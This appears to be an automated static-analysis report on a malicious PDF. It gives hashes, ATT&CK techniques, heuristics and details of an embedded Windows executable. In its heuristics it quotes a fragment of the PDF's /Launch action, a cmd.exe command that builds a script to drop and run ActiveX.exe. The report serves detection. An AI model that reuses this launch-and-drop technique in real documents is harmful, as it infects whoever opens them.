Malicious PDF — malware analysis report

Static analysis result for SHA-256 2e6fad5b424be74c…

Verdict: MALICIOUS
File type: PDF
Size: 124.9 KB
MD5: 5c19a94cccf9cf32205b325400232873
SHA-1: 326ae79505ad1c83da043487d1884cd99caf1256
SHA-256: 2e6fad5b424be74c14534e14c1e772a451609a901268fc223622da1601e959dc
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1204.002 Malicious File
  • T1553.005 Mark-of-the-Web Bypass
  • T1059.003 Windows Command Shell

The PDF contains a launch action that executes cmd.exe, which in turn is instructed to create and execute a file named ActiveX.exe. This embedded executable is likely a second-stage payload. The document body contains obfuscated strings related to the execution of cmd.exe and the creation of ActiveX.exe, indicating a clear intent to download and run a malicious payload.

Heuristics (3)

  • Launch action (critical, PDF_LAUNCH)
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application.
  • Embedded Windows executable payload in PDF stream (critical, PDF_EMBEDDED_PE_PAYLOAD)
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • /Launch action target: cmd.exe (critical, PDF_LAUNCH_COMMAND)
    PDF /Launch action specifies an executable target with parameters '/c echo m=".":n="attachment.pdf" :y="c:\\windows\\system32\\ActiveX.exe":Set t=CreateObject("Adodb"+m+"Stream"' — references a known-dangerous executable (cmd, PowerShell, etc.).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_pdf_00011b75.exe
SHA-256: 71a27c6a66888914c362c5bb938bb0eba088152d5d125154d74223679f17f87f
Kind: embedded-pe
Source: PDF decompressed stream, PE payload at offset 0x11B75
Size: 55365 bytes